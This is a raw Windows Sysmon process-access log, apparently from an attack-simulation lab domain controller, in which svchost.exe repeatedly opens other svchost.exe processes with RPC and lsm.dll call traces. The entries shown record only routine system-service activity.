13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.336{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.336{59A5CD1D-93FB-6005-FE04-00000000A301}51084896C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
